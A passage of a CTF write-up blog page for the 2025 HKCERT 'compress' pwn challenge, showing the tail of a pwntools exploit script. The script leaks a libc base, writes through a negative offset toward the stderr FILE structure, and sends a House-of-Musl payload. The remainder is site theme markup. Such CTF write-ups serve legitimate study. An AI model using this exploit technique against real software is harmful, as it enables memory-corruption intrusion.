class="hljs-string">&quot;./libc.so&quot;</span>,<span class="hljs-string">&quot;./pwn&quot;</span>],gdbscript=<span class="hljs-string">&quot;set pagination off\nset stop-on-solib-events 1&quot;</span>)<br>    <span class="hljs-keyword">return</span> io<br><br>io=Lauch()<br>io.sendlineafter(<span class="hljs-string">&quot;&gt;&gt;&quot;</span>,<span class="hljs-string">&quot;2&quot;</span>)<br>libc_leak=u64(io.recvline(keepends=<span class="hljs-literal">False</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b&#x27;\x00&#x27;</span>))<br>libc_base=libc_leak-<span class="hljs-number">0x292e50</span><br><br>io.sendlineafter(<span class="hljs-string">&quot;&gt;&gt;&quot;</span>,<span class="hljs-string">&quot;1&quot;</span>)<br>io.sendlineafter(<span class="hljs-string">&quot;Please input the offset:\n&quot;</span>,<span class="hljs-built_in">str</span>(-<span class="hljs-number">0x32e0</span>)) <span class="hljs-comment">#stderr_FILE前面一点</span><br><br>rubbish_pad=<span class="hljs-string">b&#x27;2&#x27;</span>*<span class="hljs-number">0x20</span><br>payload=rubbish_pad<br>payload+=HouseOfMusl(libc_base,libc)<br>io.sendafter(<span class="hljs-string">&quot;Please input the Content:\n&quot;</span>,payload)<br><br>io.interactive()<br></code></pre></td></tr></table></figure>
                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/" class="category-chain-item">pwn刷题记录</a>
  
  
    <span>></span>
    
  <a href="/categories/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/%E6%AF%94%E8%B5%9B%E9%A2%98%E8%A7%A3/" class="category-chain-item">比赛题解</a>
  
  

  

      </span>
    
  
</span>

    </div>
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>2025-HKCERT-compress</div>
      <div>http://0x4a-210.github.io/2025/12/22/pwn刷题记录/比赛题解/2025-HKCERT-compress/</div>
    </div>
    <div class="license-meta">
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>December 22, 2025</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/11/08/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/%E5%A0%86%E5%92%8CIO/House-of-Apple/" title="House-of-Apple">
                        <span class="hidden-mobile">House-of-Apple</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
